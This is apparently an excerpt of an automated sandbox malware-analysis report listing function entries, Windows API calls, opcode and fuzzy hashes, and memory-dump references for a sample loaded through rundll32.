                                                • API String ID: 6823918-0
                                                • Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                • Instruction ID: 5de784d7574f9188aa6451a23a921ffbe079856f50babf4c989d878cd4bace46
                                                • Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                                • Instruction Fuzzy Hash: 5CE0C2713012306FF6625734AC4CBAF36D4EF0CB52F024200FA06D5186D670CC91C6E1
                                                Function 10005410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strrchr
                                                • String ID: 123
                                                • API String ID: 3418686817-2286445522
                                                • Opcode ID: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
                                                • Instruction ID: 91c88f2fdba39316f7f8c12ec317d5d5c799cc6de1d8f02641f729906415f28d
                                                • Opcode Fuzzy Hash: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
                                                • Instruction Fuzzy Hash: 7B218CB52042042BF314C238AC46BBB3BC4DB80365F54062DFA169B1D2EDBBEA898255
                                                Function 100116B0 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(00000000,?,00000000,00000000,10009F7F,?,Win32_NetworkAdapterConfiguration), ref: 100116C2
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 100116E9
                                                • GetLastError.KERNEL32(?,00000001), ref: 100116F9
                                                • GetLastError.KERNEL32(?,00000001), ref: 100116FF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ErrorLast$ByteCharMultiWidelstrlen
                                                • String ID:
                                                • API String ID: 475730466-0
                                                • Opcode ID: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
                                                • Instruction ID: 8a47316f605976b62342ead09f9e2ff78638c0d05c570057b729d602be0c9d28
                                                • Opcode Fuzzy Hash: 74a0a33ca5c9cfc2f231fa8d56fa11b01f59c705ee89c98f7395991253ccdf2e
                                                • Instruction Fuzzy Hash: 2B01F432504226ABD7119B60CC45BDB3FB8EF023A1F204130F804DA290E730D5A1C6A5

                                                Executed Functions

                                                Function 006105A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00610625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00610658
                                                Memory Dump Source
                                                • Source File: 00000007.00000003.1850079303.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_3_610000_rundll32.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: b5c46f0294e5c5599113ec4cd8d7762fe15ee4307875876b292ad457f0063e86
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 66210835A00219BFEF008F64CC45BEEFBF6FB54394F648166E910A2280E7B44A919B94